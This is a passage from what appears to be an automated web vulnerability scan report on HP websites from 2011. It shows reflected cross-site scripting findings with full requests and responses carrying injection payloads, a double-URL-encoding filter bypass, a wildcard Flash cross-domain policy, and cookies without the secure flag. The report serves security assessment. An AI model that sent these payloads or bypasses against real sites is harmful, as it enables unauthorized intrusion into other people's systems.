This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/photo_frames/24dc5c%2522%2520a%253db%2520cbf4caecda2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:01:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=tTPyTMPS7Ty1hW8zhvjhKx3G6mZHrWppV7JYByXnBHXYCCQLhmtR!-588465799; expires=Friday, 01-Jul-2011 15:01:39 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkqi9%2BX2A1%2FMyjvuFbecgeYmmvi; expires=Friday, 28-Oct-2011 15:01:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:01:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=photo_frames&catLevel=24dc5c" a=b cbf4caecda2&mc=&product_code=DE7319&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.39. http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/projector_accessories/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4bc%2522%2520a%253db%2520828c0491f1c was submitted in the REST URL parameter 5. This input was echoed as 7c4bc" a=b 828c0491f1c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/projector_accessories/17c4bc%2522%2520a%253db%2520828c0491f1c/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:02:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=vp8HTMQG3XzThStqvk1zS3V4Lxl2cbVB2CbnqvsRskyDnxkKjG9p!-588465799; expires=Friday, 01-Jul-2011 15:02:30 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkqi9iT0QN8MSHuu1LcdAWYlmvi; expires=Friday, 28-Oct-2011 15:02:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:02:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=projector_accessories&catLevel=17c4bc" a=b 828c0491f1c&mc=&product_code=Y67350&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.40. http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12198%2522%2520a%253db%25203ef94b59804 was submitted in the REST URL parameter 5. This input was echoed as 12198" a=b 3ef94b59804 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/storage_solutions/112198%2522%2520a%253db%25203ef94b59804/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:28:33 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpjdiT2Ah5Oyzrs1racwWe0ic%3D; expires=Friday, 28-Oct-2011 12:28:33 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:28:33 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=storage_solutions&catLevel=112198" a=b 3ef94b59804&mc=&product_code=C5709A&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.41. http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8383d%2522%2520a%253db%2520197686042eb was submitted in the REST URL parameter 5. This input was echoed as 8383d" a=b 197686042eb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/storage_solutions/28383d%2522%2520a%253db%2520197686042eb/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:00:13 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=lL1RTMPdLyKr2CRxnTYMJ2j0R17GzsTyyp8Yh1wXJb59YKbxtBzL!-588465799; expires=Friday, 01-Jul-2011 15:00:13 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkqjtqQ2gt%2FOyvrv1bYcASWnWvi; expires=Friday, 28-Oct-2011 15:00:13 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:00:13 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=storage_solutions&catLevel=28383d" a=b 197686042eb&mc=&product_code=C5709A&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.42. http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9010e%2522%2520a%253db%25205147fcd0582 was submitted in the REST URL parameter 5. This input was echoed as 9010e" a=b 5147fcd0582 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/tvs/19010e%2522%2520a%253db%25205147fcd0582/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:03:01 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=mqLyTMQFmgkyggnQZ3KPZ1LVhv5gwWq92w2W1LkRxNJWkyklTdKY!-588465799; expires=Friday, 01-Jul-2011 15:03:01 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkoitif2wN4Nyrrv1vbcwOe0ic%3D; expires=Friday, 28-Oct-2011 15:03:01 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:03:01 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=tvs&catLevel=19010e" a=b 5147fcd0582&mc=&product_code=Q90165&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.43. http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13765%2522%2520a%253db%2520ba3ece890f8 was submitted in the REST URL parameter 5. This input was echoed as 13765" a=b ba3ece890f8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/tvs/213765%2522%2520a%253db%2520ba3ece890f8/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:03:17 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=2kV3TMQWrz1j4TTGN2fwn0mytn6zMrHzyCFFptsXN2XhDTqSlpTn!-588465799; expires=Friday, 01-Jul-2011 15:03:18 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkqjNGe2wx8MS%2FquFffdwae0ic%3D; expires=Friday, 28-Oct-2011 15:03:18 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:03:18 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=tvs&catLevel=213765" a=b ba3ece890f8&mc=&product_code=Q90165&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.44. http://h30415.www3.hp.com/domovoi.jsp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/domovoi.jsp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4731c"-alert(1)-"b998f9d1232 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /domovoi.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896&78db3 HTTP/1.1
Accept: */*
Referer: http://h30415.www3.hp.com/index.jsp?78db3"><script>alert(document.location)</script>c7cb7310b63=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)4731c"-alert(1)-"b998f9d1232
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:48 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/javascript; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 32430

var nsParam = '&nsid=a-4d123106:130e2c22257:1896';
var skinParam = '';
var dbgParam = '';
var player = "FLV";

//document.oncontextmenu = function() {return false;}

var imgsrc = "htt
...[SNIP]...
com";qstr += "&userAgent=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)4731c"-alert(1)-"b998f9d1232";


   qstr=qstr+"&spx="+spx+"&sd="+sd;

   var ord = "&ord=" + Math.round(Math.random()*999999);
   var newimg = document.createElement("img");
   newimg.id = action;
   newimg.src = "http://metrics.feedr
...[SNIP]...

2.45. http://h30415.www3.hp.com/notenabled.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/notenabled.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript inline comment. The payload 7e19e*/alert(1)//05781a2bc71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /notenabled.jsp HTTP/1.1
Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt; prop12=r11469; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2706904A851493DD-40000169802D546A[CE]; HP_EBUS_HP_CLICKS=1x1x4
Referer: http://www.google.com/search?hl=en&q=7e19e*/alert(1)//05781a2bc71

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:20:24 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 7092

<html>
<head>
   <title>HP Videos</title>
   <META NAME="DESCRIPTION" CONTENT="">
   <META NAME="KEYWORDS" CONTENT="">
   <META NAME="COPYRIGHT" CONTENT="Copyright . 1999-2005 The Fe
...[SNIP]...
ext/javascript">
function announce() {
/*var qstr = "?action=notenabled"    ;
qstr += "&site=hpgateway";
qstr += "&referer=http://www.google.com/search?hl=en&q=7e19e*/alert(1)//05781a2bc71";qstr += "&host=h30415.www3.hp.com";qstr += "&referral=http://www.google.com/search?hl=en&q=7e19e*/alert(1)//05781a2bc71";qstr += "&userAgent=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
...[SNIP]...

2.46. http://h30415.www3.hp.com/notenabled.jsp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/notenabled.jsp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript inline comment. The payload dae52*/alert(1)//9b120f5c2cd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /notenabled.jsp HTTP/1.1
Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)dae52*/alert(1)//9b120f5c2cd
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt; prop12=r11469; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2706904A851493DD-40000169802D546A[CE]; HP_EBUS_HP_CLICKS=1x1x4

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:20:22 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 6973

<html>
<head>
   <title>HP Videos</title>
   <META NAME="DESCRIPTION" CONTENT="">
   <META NAME="KEYWORDS" CONTENT="">
   <META NAME="COPYRIGHT" CONTENT="Copyright . 1999-2005 The Fe
...[SNIP]...
com";qstr += "&userAgent=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)dae52*/alert(1)//9b120f5c2cd";

var ord = "&ord=" + Math.random();
var newimg = document.createElement("img");
newimg.id = "notenabled";
newimg.src = "http://metrics.feedroom.com/af
...[SNIP]...

3. Flash cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h41112.www4.hp.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41112.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:46:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8d
Last-Modified: Tue, 09 Feb 2010 15:53:27 GMT
Accept-Ranges: bytes
Content-Length: 776
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>


    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


    <cross-domain-policy>


    <allow-access-from domain="*" />
...[SNIP]...

4. SSL cookie without secure flag set previous next
There are 3 instances of this issue:

https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx
https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php
https://hp.digitalriver.com/store

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

4.1. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://h30046.www3.hp.com
Path:	/subchoice/country/us/en/subhub.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=vbdir4jnugzl5h55sucvwk45; path=/; HttpOnly
SMIDENTITY=/3VZN3FtH+hlxGfJLqNFLtagi6gf4FQoPwe2XUIZ2qMfXsZjQRUGqjyKzn3qMcESI99852jNsmZKF8N0Bg4VVhJuRUXPHO+xRK9aQ95vt+5C6GZfX68EdPpeHTOXGtLW0hgmqU4j4eaivBMX2/to2rV7xy+3kTQDin/+NcNlgpSP+rsiPN7uUr1wzRceIshLNO96vteYGXP4F715O95s2m1V8t7jd9tOh/7ICKScDH2l9uNs3fBlMPaBJsyqYYZ6lf7hLd8Ya7WDtahDcQ22hkjwob61vRK+0/q/HUTdSnkKHzoFjRI0hJPBnvw5M87ko0XgWn5deTuTIkSLcAb9jFTCVS6BtuYpJgKCJtFHs8moRxGKDOoNUZUk1OTB2tgBK+QHzbrlSN4QQElS4lQ0bLoqCcWIGSxPHddJkwN0PARJ9O0troqmfLlz7r3lUFPW32wth48xu3sV1rh/fNm7vQMZDcrsydoyK4QwHQ616ZAcbgAKS9ra3uAZytb44gk+CZmGBJ3nTfPbtkYUg08oUfyI/lTuugHuTMd3k9a6L099jZQax5nHSds660rhmJhK; path=/; domain=.hp.com
lang=en-us; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jun 2011 11:52:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=/3VZN3FtH+hlxGfJLqNFLtagi6gf4FQoPwe2XUIZ2qMfXsZjQRUGqjyKzn3qMcESI99852jNsmZKF8N0Bg4VVhJuRUXPHO+xRK9aQ95vt+5C6GZfX68EdPpeHTOXGtLW0hgmqU4j4eaivBMX2/to2rV7xy+3kTQDin/+NcNlgpSP+rsiPN7uUr1wzRceIshLNO96vteYGXP4F715O95s2m1V8t7jd9tOh/7ICKScDH2l9uNs3fBlMPaBJsyqYYZ6lf7hLd8Ya7WDtahDcQ22hkjwob61vRK+0/q/HUTdSnkKHzoFjRI0hJPBnvw5M87ko0XgWn5deTuTIkSLcAb9jFTCVS6BtuYpJgKCJtFHs8moRxGKDOoNUZUk1OTB2tgBK+QHzbrlSN4QQElS4lQ0bLoqCcWIGSxPHddJkwN0PARJ9O0troqmfLlz7r3lUFPW32wth48xu3sV1rh/fNm7vQMZDcrsydoyK4QwHQ616ZAcbgAKS9ra3uAZytb44gk+CZmGBJ3nTfPbtkYUg08oUfyI/lTuugHuTMd3k9a6L099jZQax5nHSds660rhmJhK; path=/; domain=.hp.com
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vbdir4jnugzl5h55sucvwk45; path=/; HttpOnly
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=signup; expires=Thu, 30-Jun-2011 19:52:06 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 102777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...

4.2. https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30406.www3.hp.com
Path:	/campaigns/2011/promo/1-9XZBS/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com
sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaigns/2011/promo/1-9XZBS/index.php?&mcc=HBPQ&jumpid=ex_r2548/us/mar11/ent/eb-ts/1-9XZBS/mcc HTTP/1.1
Host: h30406.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.3. https://hp.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/store

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; expires=Fri, 29-Jun-2012 17:43:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

